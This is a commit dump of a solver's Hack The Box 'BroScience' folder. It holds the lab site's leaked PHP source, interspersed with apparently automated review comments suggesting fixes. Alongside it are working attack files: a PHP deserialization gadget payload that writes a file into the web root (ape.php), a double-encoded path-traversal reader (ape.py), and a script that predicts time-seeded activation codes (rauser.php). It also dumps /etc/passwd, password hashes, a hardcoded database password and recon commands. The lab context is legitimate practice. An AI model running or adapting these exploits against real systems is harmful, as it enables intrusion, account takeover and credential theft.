old htb folders
2023-08-29 21:53:22 +02:00
parent 62ab804867
commit 82b0759f1e
21891 changed files with 6277643 additions and 0 deletions


@@ -0,0 +1,63 @@
<?php
session_start();
// Check if user is logged in already
if (isset($_SESSION['id'])) {
header('Location: /index.php');
}
if (isset($_GET['code'])) {
// Check if code is formatted correctly (regex)
if (preg_match('/^[A-z0-9]{32}$/', $_GET['code'])) {
// Check for code in database
include_once 'includes/db_connect.php';
$res = pg_prepare($db_conn, "check_code_query", 'SELECT id, is_activated::int FROM users WHERE activation_code=$1');
$res = pg_execute($db_conn, "check_code_query", array($_GET['code']));
if (pg_num_rows($res) == 1) {
// Check if account already activated
$row = pg_fetch_row($res);
if (!(bool)$row[1]) {
// Activate account
$res = pg_prepare($db_conn, "activate_account_query", 'UPDATE users SET is_activated=TRUE WHERE id=$1');
$res = pg_execute($db_conn, "activate_account_query", array($row[0]));
$alert = "Account activated!";
$alert_type = "success";
} else {
$alert = 'Account already activated.';
}
} else {
$alert = "Invalid activation code.";
}
} else {
$alert = "Invalid activation code.";
}
} else {
$alert = "Missing activation code.";
}
?>
<html>
<head>
<title>BroScience : Activate account</title>
<?php include_once 'includes/header.php'; ?>
</head>
<body>
<?php include_once 'includes/navbar.php'; ?>
<div class="uk-container uk-container-xsmall">
<?php
// Display any alerts
if (isset($alert)) {
?>
<div uk-alert class="uk-alert-<?php if(isset($alert_type)){echo $alert_type;}else{echo 'danger';} ?>">
<a class="uk-alert-close" uk-close></a>
<?=$alert?>
</div>
<?php
}
?>
</div>
</body>
</html>
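Review bot: The `header('Location: /index.php');` call at the top is not followed by `exit;`, so a request from a logged-in session still runs the activation lookup and renders the page after the redirect header is queued; add `exit;` inside that `if`. login.php and register.php open with the same redirect and need the same line. In the `preg_match` pattern, `[A-z0-9]` also matches the six ASCII characters between `Z` and `a` (`[`, `\`, `]`, `^`, `_` and the backtick); `'/^[A-Za-z0-9]{32}$/'` matches only the alphabet that `generate_activation_code()` draws from.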

30
HTB/broscience/ape.php Normal file

@@ -0,0 +1,30 @@
<?php
class Avatar {
public $imgPath;
public function __construct($imgPath) {
$this->imgPath = $imgPath;
}
public function save($tmp) {
$f = fopen($this->imgPath, "w");
fwrite($f, file_get_contents($tmp));
fclose($f);
}
}
class AvatarInterface {
public $tmp = "/etc/passwd";
public $imgPath = "/var/www/html/shell.php";
public function __wakeup() {
$a = new Avatar($this->imgPath);
$a->save($this->tmp);
}
}
$a = new AvatarInterface();
echo base64_encode(serialize($a));
?>

14
HTB/broscience/ape.py Normal file

@@ -0,0 +1,14 @@
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def encode_all(string):
return "".join("%{0:0>2}".format(format(ord(char), "x")) for char in string)
if __name__ == '__main__':
while True:
i = input("~ ")
file = f"../includes/{i}"
file = encode_all(file)
file = encode_all(file)
r = requests.get(f"https://broscience.htb/includes/img.php?path={file}", verify=False)
print(r.text)

39
HTB/broscience/etc.passwd Normal file

@@ -0,0 +1,39 @@
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
tss:x:103:109:TPM software stack,,,:/var/lib/tpm:/bin/false
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:105:111:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:106:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:107:115:RealtimeKit,,,:/proc:/usr/sbin/nologin
sshd:x:108:65534::/run/sshd:/usr/sbin/nologin
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
avahi:x:110:116:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
pulse:x:112:118:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
saned:x:113:121::/var/lib/saned:/usr/sbin/nologin
colord:x:114:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:115:123::/var/lib/geoclue:/usr/sbin/nologin
Debian-gdm:x:116:124:Gnome Display Manager:/var/lib/gdm3:/bin/false
bill:x:1000:1000:bill,,,:/home/bill:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
postgres:x:117:125:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
_laurel:x:998:998::/var/log/laurel:/bin/false


5
HTB/broscience/hash Normal file

@@ -0,0 +1,5 @@
13edad4932da9dbb57d9cd15b66ed104:NaCl
15657792073e8a843d4f91fc403454e1:NaCl
bd3dad50e2d578ecba87d5fa15ca5f85:NaCl
a7eed23a7be6fe0d765197b1027453fe:NaCl
5d15340bded5b9395d5d14b9c21bc82b:NaCl


@@ -0,0 +1,14 @@
<?php
$db_host = "localhost";
$db_port = "5432";
$db_name = "broscience";
$db_user = "dbuser";
$db_pass = "RangeOfMotion%777";
$db_salt = "NaCl";
$db_conn = pg_connect("host={$db_host} port={$db_port} dbname={$db_name} user={$db_user} password={$db_pass}");
if (!$db_conn) {
die("<b>Error</b>: Unable to connect to database");
}
?>
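Review bot: `$db_pass` and `$db_salt` are string literals in a PHP file that the other pages load as `includes/db_connect.php`, so any source disclosure (a file-read bug, a backup copy, this commit) hands over the database credential and the password salt together. Read them from the environment or from a config file outside the document root, for example `$db_pass = getenv('DB_PASS');`, and treat the committed values as burned. The `die()` message does not echo `pg_last_error()`, which is worth keeping that way.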


@@ -0,0 +1,118 @@
<?php
function generate_activation_code() {
$chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
srand(time());
$activation_code = "";
for ($i = 0; $i < 32; $i++) {
$activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)];
}
return $activation_code;
}
// Source: https://stackoverflow.com/a/4420773 (Slightly adapted)
function rel_time($from, $to = null) {
$to = (($to === null) ? (time()) : ($to));
$to = ((is_int($to)) ? ($to) : (strtotime($to)));
$from = ((is_int($from)) ? ($from) : (strtotime($from)));
$units = array
(
"year" => 29030400, // seconds in a year (12 months)
"month" => 2419200, // seconds in a month (4 weeks)
"week" => 604800, // seconds in a week (7 days)
"day" => 86400, // seconds in a day (24 hours)
"hour" => 3600, // seconds in an hour (60 minutes)
"minute" => 60, // seconds in a minute (60 seconds)
"second" => 1 // 1 second
);
$diff = abs($from - $to);
if ($diff < 1) {
return "Just now";
}
$suffix = (($from > $to) ? ("from now") : ("ago"));
$unitCount = 0;
$output = "";
foreach($units as $unit => $mult)
if($diff >= $mult && $unitCount < 1) {
$unitCount += 1;
// $and = (($mult != 1) ? ("") : ("and "));
$and = "";
$output .= ", ".$and.intval($diff / $mult)." ".$unit.((intval($diff / $mult) == 1) ? ("") : ("s"));
$diff -= intval($diff / $mult) * $mult;
}
$output .= " ".$suffix;
$output = substr($output, strlen(", "));
return $output;
}
class UserPrefs {
public $theme;
public function __construct($theme = "light") {
$this->theme = $theme;
}
}
function get_theme() {
if (isset($_SESSION['id'])) {
if (!isset($_COOKIE['user-prefs'])) {
$up_cookie = base64_encode(serialize(new UserPrefs()));
setcookie('user-prefs', $up_cookie);
} else {
$up_cookie = $_COOKIE['user-prefs'];
}
$up = unserialize(base64_decode($up_cookie));
return $up->theme;
} else {
return "light";
}
}
function get_theme_class($theme = null) {
if (!isset($theme)) {
$theme = get_theme();
}
if (strcmp($theme, "light")) {
return "uk-light";
} else {
return "uk-dark";
}
}
function set_theme($val) {
if (isset($_SESSION['id'])) {
setcookie('user-prefs',base64_encode(serialize(new UserPrefs($val))));
}
}
class Avatar {
public $imgPath;
public function __construct($imgPath) {
$this->imgPath = $imgPath;
}
public function save($tmp) {
$f = fopen($this->imgPath, "w");
fwrite($f, file_get_contents($tmp));
fclose($f);
}
}
class AvatarInterface {
public $tmp;
public $imgPath;
public function __wakeup() {
$a = new Avatar($this->imgPath);
$a->save($this->tmp);
}
}
?>
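Review bot: `get_theme()` passes the `user-prefs` cookie straight to `unserialize()`, and this file also defines `AvatarInterface::__wakeup()`, which copies `$this->tmp` to `$this->imgPath` as soon as such an object is unserialized, so the cookie decides which classes get instantiated and what their magic methods do. Restrict the call to the one expected class, `$up = unserialize(base64_decode($up_cookie), ['allowed_classes' => ['UserPrefs']]);`, check `$up instanceof UserPrefs` before reading `->theme`, and compare the theme against a fixed list, since index.php prints it into a stylesheet URL; storing the theme as a plain string cookie would avoid `unserialize()` altogether. Separately, `generate_activation_code()` seeds with `srand(time())`, which makes the code a function of the registration second; drop the `srand()` call and index with `random_int(0, strlen($chars) - 1)`.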

50
HTB/broscience/index.php Normal file

@@ -0,0 +1,50 @@
<?php
session_start();
?>
<html>
<head>
<title>BroScience : Home</title>
<?php
include_once 'includes/header.php';
include_once 'includes/utils.php';
$theme = get_theme();
?>
<link rel="stylesheet" href="styles/<?=$theme?>.css">
</head>
<body class="<?=get_theme_class($theme)?>">
<?php include_once 'includes/navbar.php'; ?>
<div class="uk-container uk-margin">
<!-- TODO: Search bar -->
<?php
include_once 'includes/db_connect.php';
// Load exercises
$res = pg_query($db_conn, 'SELECT exercises.id, username, title, image, SUBSTRING(content, 1, 100), exercises.date_created, users.id FROM exercises JOIN users ON author_id = users.id');
if (pg_num_rows($res) > 0) {
echo '<div class="uk-child-width-1-2@s uk-child-width-1-3@m" uk-grid>';
while ($row = pg_fetch_row($res)) {
?>
<div>
<div class="uk-card uk-card-default <?=(strcmp($theme,"light"))?"uk-card-secondary":""?>">
<div class="uk-card-media-top">
<img src="includes/img.php?path=<?=$row[3]?>" width="600" height="600" alt="">
</div>
<div class="uk-card-body">
<a href="exercise.php?id=<?=$row[0]?>" class="uk-card-title"><?=$row[2]?></a>
<p><?=$row[4]?>... <a href="exercise.php?id=<?=$row[0]?>">keep reading</a></p>
</div>
<div class="uk-card-footer">
<p class="uk-text-meta">Written by <a class="uk-link-text" href="user.php?id=<?=$row[6]?>"><?=htmlspecialchars($row[1],ENT_QUOTES,'UTF-8')?></a> <?=rel_time($row[5])?></p>
</div>
</div>
</div>
<?php
}
echo '</div>';
}
?>
</div>
</body>
</html>
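Review bot: Only the username is passed through `htmlspecialchars()`; `$row[2]` (title), `$row[4]` (content excerpt), `$row[3]` (image path, inside the `src` attribute) and `$theme` (inside the stylesheet `href`) are echoed raw, so any of those values containing markup or a quote is rendered as HTML. Apply the same call already used for the username to each of them, e.g. `<?=htmlspecialchars($row[2], ENT_QUOTES, 'UTF-8')?>`, and use `urlencode($row[3])` for the `path=` query value. The result of `pg_query()` is also passed to `pg_num_rows()` without a check for `false`.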

80
HTB/broscience/login.php Normal file

@@ -0,0 +1,80 @@
<?php
session_start();
// Check if user is logged in already
if (isset($_SESSION['id'])) {
header('Location: /index.php');
}
// Handle a submitted log in form
if (isset($_POST['username']) && isset($_POST['password'])) {
// Check if variables are empty
if (!empty($_POST['username']) && !empty($_POST['password'])) {
include_once 'includes/db_connect.php';
// Check if username:password is correct
$res = pg_prepare($db_conn, "login_query", 'SELECT id, username, is_activated::int, is_admin::int FROM users WHERE username=$1 AND password=$2');
$res = pg_execute($db_conn, "login_query", array($_POST['username'], md5($db_salt . $_POST['password'])));
if (pg_num_rows($res) == 1) {
// Check if account is activated
$row = pg_fetch_row($res);
if ((bool)$row[2]) {
// User is logged in
$_SESSION['id'] = $row[0];
$_SESSION['username'] = $row[1];
$_SESSION['is_admin'] = $row[3];
// Redirect to home page
header('Location: /index.php');
} else {
$alert = "Account is not activated yet";
}
} else {
$alert = "Username or password is incorrect.";
}
} else {
$alert = "Please fill in both username and password.";
}
}
?>
<html>
<head>
<title>BroScience : Log In</title>
<?php include_once 'includes/header.php'; ?>
</head>
<body>
<?php include_once 'includes/navbar.php'; ?>
<div class="uk-container uk-container-xsmall">
<form class="uk-form-stacked" method="POST" action="login.php">
<fieldset class="uk-fieldset">
<legend class="uk-legend">Log In</legend>
<?php
// Display any alerts
if (isset($alert)) {
?>
<div uk-alert class="uk-alert-<?php if(isset($alert_type)){echo $alert_type;}else{echo 'danger';} ?>">
<a class="uk-alert-close" uk-close></a>
<?=$alert?>
</div>
<?php
}
?>
<div class="uk-margin">
<input name="username" class="uk-input" placeholder="Username">
</div>
<div class="uk-margin">
<input name="password" class="uk-input" type="password" placeholder="Password">
</div>
<div class="uk-margin">
<button class="uk-button uk-button-default" type="submit">Log in</button>
</div>
<div class="uk-margin">
<a href="register.php">Create an account</a>
</div>
</fieldset>
</form>
</div>
</body>
</html>
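Review bot: The password check is `md5($db_salt . $_POST['password'])` compared inside the SQL `WHERE` clause, i.e. a single fast MD5 round with one salt shared by all accounts; register.php stores passwords the same way. Select the row by username only and verify with `password_verify()`, with register.php storing `password_hash($_POST['password'], PASSWORD_DEFAULT)`; existing MD5 rows would need a reset or a rehash-on-login path, which this page does not show. The successful branch should also call `session_regenerate_id(true)` before filling `$_SESSION`. The sketch below covers only the lookup and verification lines.

```php
// … unchanged: session_start(), redirect, empty-field checks, db_connect include …
$res = pg_prepare($db_conn, "login_query", 'SELECT id, username, is_activated::int, is_admin::int, password FROM users WHERE username=$1');
$res = pg_execute($db_conn, "login_query", array($_POST['username']));
$row = ($res && pg_num_rows($res) == 1) ? pg_fetch_row($res) : null;
// password column is assumed to hold password_hash() output once register.php is changed
if ($row !== null && password_verify($_POST['password'], $row[4])) {
    // … unchanged: is_activated check …
    session_regenerate_id(true);
    // … unchanged: $_SESSION assignments and redirect …
```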

20
HTB/broscience/login.req Normal file

@@ -0,0 +1,20 @@
POST /login.php HTTP/1.1
Host: broscience.htb
Cookie: PHPSESSID=a8079i4m03ms9345aci7vep369
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: https://broscience.htb
Referer: https://broscience.htb/login.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
username=user&password=pass

82
HTB/broscience/rauser.php Normal file

@@ -0,0 +1,82 @@
<?php
$username = "user" . rand(1,9999);
$email = $username . "@mail.com";
$password = "password";
$url = 'https://broscience.htb/register.php';
//username=user1&email=user1%40email.com&password=password&password-confirm=password
$data = array('username' => $username, 'email' => $email, 'password' => $password, 'password-confirm' => $password);
echo implode(" ",$data). "\n";
// use key 'http' even if you send the request to https://...
$options = array(
"ssl"=>array(
"verify_peer"=>false,
"verify_peer_name"=>false,
),
'http' => array(
'header' => "Content-type: application/x-www-form-urlencoded\r\n",
'method' => 'POST',
'content' => http_build_query($data),
)
);
$tstart = time();
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context,);
$tend = time();
echo $tend . " - " . $tstart . " = " . $tend - $tstart . "\n";
function generate_activation_code($t) {
$chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
srand($t);
$activation_code = "";
for ($i = 0; $i < 32; $i++) {
$activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)];
}
return $activation_code;
}
function check($code){
$url = "https://broscience.htb/activate.php?code=" . $code;
$options = array(
"ssl"=>array(
"verify_peer"=>false,
"verify_peer_name"=>false,
),
'http' => array(
'header' => "Content-type: application/x-www-form-urlencoded\r\n",
'method' => 'GET',
)
);
$tstart = time();
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context,);
if ($result === FALSE) { /* Handle error */ }
if(str_contains($result, "Invalid activation code.")){
return false;
}
return true;
}
echo $tstart . " -> ";
$tstart = $tstart - 5;
$code = generate_activation_code($tstart);
while(!check($code)){
$tstart = $tstart + 1;
$code = generate_activation_code($tstart);
}
echo $tstart . "\n";
echo $code
?>

117
HTB/broscience/register.php Normal file

@@ -0,0 +1,117 @@
<?php
session_start();
// Check if user is logged in already
if (isset($_SESSION['id'])) {
header('Location: /index.php');
}
// Handle a submitted register form
if (isset($_POST['username']) && isset($_POST['email']) && isset($_POST['password']) && isset($_POST['password-confirm'])) {
// Check if variables are empty
if (!empty($_POST['username']) && !empty($_POST['email']) && !empty($_POST['password']) && !empty($_POST['password-confirm'])) {
// Check if passwords match
if (strcmp($_POST['password'], $_POST['password-confirm']) == 0) {
// Check if email is too long
if (strlen($_POST['email']) <= 100) {
// Check if email is valid
if (filter_var($_POST['email'], FILTER_VALIDATE_EMAIL)) {
// Check if username is valid
if (strlen($_POST['username']) <= 100) {
// Check if user exists already
include_once 'includes/db_connect.php';
$res = pg_prepare($db_conn, "check_username_query", 'SELECT id FROM users WHERE username = $1');
$res = pg_execute($db_conn, "check_username_query", array($_POST['username']));
if (pg_num_rows($res) == 0) {
// Check if email is registered already
$res = pg_prepare($db_conn, "check_email_query", 'SELECT id FROM users WHERE email = $1');
$res = pg_execute($db_conn, "check_email_query", array($_POST['email']));
if (pg_num_rows($res) == 0) {
// Create the account
include_once 'includes/utils.php';
$activation_code = generate_activation_code();
$res = pg_prepare($db_conn, "check_code_unique_query", 'SELECT id FROM users WHERE activation_code = $1');
$res = pg_execute($db_conn, "check_code_unique_query", array($activation_code));
if (pg_num_rows($res) == 0) {
$res = pg_prepare($db_conn, "create_user_query", 'INSERT INTO users (username, password, email, activation_code) VALUES ($1, $2, $3, $4)');
$res = pg_execute($db_conn, "create_user_query", array($_POST['username'], md5($db_salt . $_POST['password']), $_POST['email'], $activation_code));
// TODO: Send the activation link to email
$activation_link = "https://broscience.htb/activate.php?code={$activation_code}";
$alert = "Account created. Please check your email for the activation link.";
$alert_type = "success";
} else {
$alert = "Failed to generate a valid activation code, please try again.";
}
} else {
$alert = "An account with this email already exists.";
}
}
else {
$alert = "Username is already taken.";
}
} else {
$alert = "Maximum username length is 100 characters.";
}
} else {
$alert = "Please enter a valid email address.";
}
} else {
$alert = "Maximum email length is 100 characters.";
}
} else {
$alert = "Passwords do not match.";
}
} else {
$alert = "Please fill all fields in.";
}
}
?>
<html>
<head>
<title>BroScience : Register</title>
<?php include_once 'includes/header.php'; ?>
</head>
<body>
<?php include_once 'includes/navbar.php'; ?>
<div class="uk-container uk-container-xsmall">
<form class="uk-form-stacked" method="POST" action="register.php">
<fieldset class="uk-fieldset">
<legend class="uk-legend">Register</legend>
<?php
// Display any alerts
if (isset($alert)) {
?>
<div uk-alert class="uk-alert-<?php if(isset($alert_type)){echo $alert_type;}else{echo 'danger';} ?>">
<a class="uk-alert-close" uk-close></a>
<?=$alert?>
</div>
<?php
}
?>
<div class="uk-margin">
<input name="username" class="uk-input" placeholder="Username">
</div>
<div class="uk-margin">
<input name="email" class="uk-input" type="email" placeholder="Email">
</div>
<div class="uk-margin">
<input name="password" class="uk-input" type="password" placeholder="Password">
</div>
<div class="uk-margin">
<input name="password-confirm" class="uk-input" type="password" placeholder="Repeat password">
</div>
<div class="uk-margin">
<button class="uk-button uk-button-default" type="submit">Register</button>
</div>
</fieldset>
</form>
</div>
</body>
</html>
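Review bot: The return value of the `create_user_query` `pg_execute()` call is assigned to `$res` and never inspected, so a failed `INSERT` (for instance a constraint violation from a concurrent registration that passed the same pre-checks) still shows "Account created."; set the success alert only inside `if ($res !== false) { ... }` and show a generic failure otherwise. The separate SELECT-then-INSERT checks for username, email and activation code are not atomic; a unique constraint on those columns, if the schema does not already have one, is what actually enforces them. The seven levels of nested `if`/`else` would read more easily as guard clauses that set `$alert` and stop.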


@@ -0,0 +1,20 @@
POST /register.php HTTP/1.1
Host: broscience.htb
Cookie: PHPSESSID=a8079i4m03ms9345aci7vep369
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
Origin: https://broscience.htb
Referer: https://broscience.htb/register.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
username=user&email=user%40mail.com&password=password&password-confirm=password

57
HTB/broscience/renew_cert.sh Executable file

@@ -0,0 +1,57 @@
#!/bin/bash
if [ "$#" -ne 1 ] || [ $1 == "-h" ] || [ $1 == "--help" ] || [ $1 == "help" ]; then
echo "Usage: $0 certificate.crt";
exit 0;
fi
if [ -f $1 ]; then
openssl x509 -in $1 -noout -checkend 86400 > /dev/null
if [ $? -eq 0 ]; then
echo "No need to renew yet.";
exit 1;
fi
subject=$(openssl x509 -in $1 -noout -subject | cut -d "=" -f2-)
country=$(echo $subject | grep -Eo 'C = .{2}')
state=$(echo $subject | grep -Eo 'ST = .*,')
locality=$(echo $subject | grep -Eo 'L = .*,')
organization=$(echo $subject | grep -Eo 'O = .*,')
organizationUnit=$(echo $subject | grep -Eo 'OU = .*,')
commonName=$(echo $subject | grep -Eo 'CN = .*,?')
emailAddress=$(openssl x509 -in $1 -noout -email)
country=${country:4}
state=$(echo ${state:5} | awk -F, '{print $1}')
locality=$(echo ${locality:3} | awk -F, '{print $1}')
organization=$(echo ${organization:4} | awk -F, '{print $1}')
organizationUnit=$(echo ${organizationUnit:5} | awk -F, '{print $1}')
commonName=$(echo ${commonName:5} | awk -F, '{print $1}')
echo $subject;
echo "";
echo "Country => $country";
echo "State => $state";
echo "Locality => $locality";
echo "Org Name => $organization";
echo "Org Unit => $organizationUnit";
echo "Common Name => $commonName";
echo "Email => $emailAddress";
echo -e "\nGenerating certificate...";
openssl req -x509 -sha256 -nodes -newkey rsa:4096 -keyout /tmp/temp.key -out /tmp/temp.crt -days 365 <<<"$country
$state
$locality
$organization
$organizationUnit
$commonName
$emailAddress
" 2>/dev/null
/bin/bash -c "mv /tmp/temp.crt /home/bill/Certs/$commonName.crt"
else
echo "File doesn't exist"
exit 1;
fi
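Review bot: The last step runs `/bin/bash -c "mv /tmp/temp.crt /home/bill/Certs/$commonName.crt"`, and `$commonName` is parsed from the subject of the certificate named in `$1`, so whoever supplies that certificate controls text that a second shell re-parses; shell metacharacters or `/` in the CN would be interpreted rather than used as a file name. Call `mv` directly and validate first: `[[ "$commonName" =~ ^[A-Za-z0-9.-]+$ ]] || exit 1` followed by `mv -- /tmp/temp.crt "/home/bill/Certs/${commonName}.crt"`. `$1` is unquoted throughout (`[ -f $1 ]`, `openssl x509 -in $1`), and the fixed `/tmp/temp.key` and `/tmp/temp.crt` names should come from `mktemp` so another local user cannot pre-create them.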


@@ -0,0 +1,24 @@
[*] ssh found on tcp/22.
[*] http found on tcp/80.
[*] http found on tcp/443.
[*] ssh found on tcp/22.
[*] http found on tcp/80.
[*] http found on tcp/443.


@@ -0,0 +1,92 @@
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/broscience/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/xml/_quick_tcp_nmap.xml" 10.10.11.195
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/broscience/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/xml/_full_tcp_nmap.xml" 10.10.11.195
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/kali/htb/broscience/results/scans/_top_100_udp_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/xml/_top_100_udp_nmap.xml" 10.10.11.195
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/broscience/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.10.11.195
feroxbuster -u http://10.10.11.195:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://10.10.11.195:80/.well-known/security.txt
curl -sSikf http://10.10.11.195:80/robots.txt
curl -sSik http://10.10.11.195:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.10.11.195
curl -sk -o /dev/null -H "Host: IFNNekNxlqYWYapbffxt.broscience.htb" http://broscience.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://10.10.11.195:80 2>&1
wkhtmltoimage --format png http://10.10.11.195:80/ /home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_screenshot.png
feroxbuster -u https://10.10.11.195:443/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_feroxbuster_dirbuster.txt"
curl -sSikf https://10.10.11.195:443/.well-known/security.txt
curl -sSikf https://10.10.11.195:443/robots.txt
curl -sSik https://10.10.11.195:443/
nmap -vv --reason -Pn -T4 -sV -p 443 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/tcp443/xml/tcp_443_https_nmap.xml" 10.10.11.195
sslscan --show-certificate --no-colour 10.10.11.195:443 2>&1
curl -sk -o /dev/null -H "Host: UAJazqQgdJcyUjSdHhQO.broscience.htb" https://broscience.htb:443/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v https://10.10.11.195:443 2>&1
wkhtmltoimage --format png https://10.10.11.195:443/ /home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_screenshot.png
ffuf -u http://broscience.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.broscience.htb" -fs 332 -noninteractive -s | tee "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_broscience.htb_vhosts_subdomains-top1million-110000.txt"
ffuf -u https://broscience.htb:443/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.broscience.htb" -fs 9308 -noninteractive -s | tee "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_broscience.htb_vhosts_subdomains-top1million-110000.txt"
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/broscience/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/xml/_quick_tcp_nmap.xml" 10.10.11.195
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/broscience/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/xml/_full_tcp_nmap.xml" 10.10.11.195
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/kali/htb/broscience/results/scans/_top_100_udp_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/xml/_top_100_udp_nmap.xml" 10.10.11.195
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/broscience/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.10.11.195
feroxbuster -u http://10.10.11.195:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://10.10.11.195:80/.well-known/security.txt
curl -sSikf http://10.10.11.195:80/robots.txt
curl -sSik http://10.10.11.195:80/
